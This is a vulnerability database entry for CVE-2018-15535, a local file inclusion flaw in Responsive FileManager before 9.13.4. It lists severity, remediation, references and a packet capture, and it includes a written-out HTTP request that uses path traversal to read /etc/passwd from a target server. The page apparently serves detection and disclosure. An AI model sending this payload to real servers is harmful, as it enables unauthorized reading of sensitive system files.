🔙 목록으로 돌아가기

CVE-2018-15535: Responsive FileManager <9.13.4 - Local File Inclusion

TitleResponsive FileManager <9.13.4 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability.
CVSS Score7.5
EPSS Score0.81247
CVE IDCVE-2018-15535
CWE IDCWE-22
Tags cve cve2018 lfi edb seclists tecrail vuln

🔍 Vulnerability Description

Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.

🌐 HTTP Request

GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-15535.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-15535.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A